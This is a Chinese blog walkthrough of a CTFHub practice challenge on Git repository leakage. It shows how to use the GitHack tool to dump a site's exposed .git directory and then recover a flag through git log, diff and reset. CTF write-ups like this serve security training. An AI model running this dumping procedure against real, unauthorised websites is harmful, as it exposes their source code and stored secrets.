CTFHUB-技能树-Git泄露-Log

2023-7-31

当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题

工具

步骤

  • 获取工具,
git clone https://github.com/BugScanTeam/GitHack.git
  • 获取工具--反代
git clone https://github.bravexist.cn/https://github.com/BugScanTeam/GitHack.git
  • 使用工具处理git泄露情况,记得添加端口号
python2 GitHack.py <url>(url格式:http(s)://XXX/.git/)
  •  查看结果
cd dist
cd xxxx
ls -a ./git
  • 使用git log 查看历史记录
git log
  •  比较 add flag
git diff xxx
  • 或者直接切换到 add flag ,直接查看txt里的flag
git reset --hard xxxx
cat xxx.txt
  • 得到了flag

 

版权声明:
作者:qiankong
链接:https://bravexist.cn/2023/07/ctfhub-git-leak-log.html
文章版权归作者所有,未经允许请勿转载。
THE END
计算机编码
<<上一篇
CTFHUB-技能树-Git泄露-Stash
下一篇>>
相关推荐
CTFHUB-技能树-Git泄露-Index
CTFHUB-技能树-Git泄露-Stash
CTFHUB-技能树-Git泄露-Log
Copyright © 2025 一世贪欢的私域 CoreNext Powered by WordPress
本站支持SSL安全访问